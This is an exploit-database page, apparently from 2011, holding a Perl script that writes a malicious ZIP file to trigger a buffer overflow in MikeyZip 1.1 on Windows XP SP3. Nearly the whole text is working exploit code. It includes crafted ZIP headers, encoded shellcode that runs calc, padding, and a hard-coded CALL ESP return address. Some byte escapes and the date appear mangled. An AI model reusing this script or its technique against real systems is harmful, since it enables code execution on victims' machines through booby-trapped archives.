Home / exploits MikeyZip 1.1 ZIP Buffer Overflow
Posted on 11 April 2011
#!/usr/bin/perl # # #[+]Exploit Title: MikeyZip 1.1 .ZIP File Buffer Overflow #[+]Date: 10�42011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.softpedia.com/get/Compression-tools/MikeyZip.shtml #[+]Version: 1.1 #[+]Tested On: WIN-XP SP3 Brazil Portuguese #[+]CVE: N/A # # # use strict; use warnings; my $filename = "Exploit.zip"; print " MikeyZip 1.1 .ZIP File Buffer Overflow "; print " Created by C4SS!0 G0M3S "; print " E-mail Louredo_@hotmail.com "; print " Site www.exploit-br.org/ "; print " [+] Creting ZIP File... "; sleep(1); my $head = "x50x4Bx03x04x14x00x00". "x00x00x00xB7xACxCEx34x00x00x00" . "x00x00x00x00x00x00x00x00" . "xe4x0f" . "x00x00x00"; my $head2 = "x50x4Bx01x02x14x00x14". "x00x00x00x00x00xB7xACxCEx34x00x00x00" . "x00x00x00x00x00x00x00x00x00". "xe4x0f". "x00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; my $head3 = "x50x4Bx05x06x00x00x00". "x00x01x00x01x00". "x12x10x00x00". "x02x10x00x00". "x00x00"; # #LITTLE SHELLCODE WinExec("calc",0) # my $payload = "JJJJJJJJJJJRYVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI03YP0PSXU3512LCSPTPXF0". "ONTMGUMVSLKON6A"; $payload .= "x41" x (238-length($payload)); $payload .= pack('V',0x774D3E78);#CALL ESP on kernel32.dll WINX-XP SP3 $payload .= "x61" x 10;#6 x POPAD $payload .= "x98xe3";#CALL EDX $payload .= "x41" x (4064-length($payload)); $payload = $payload.".txt"; my $zip = $head.$payload.$head2.$payload.$head3; open(FILE,">file.zip") || die "[-]Error: $! "; print FILE $zip; close(FILE); print "[+] ZIP File Created With Sucess:) "; sleep(3);
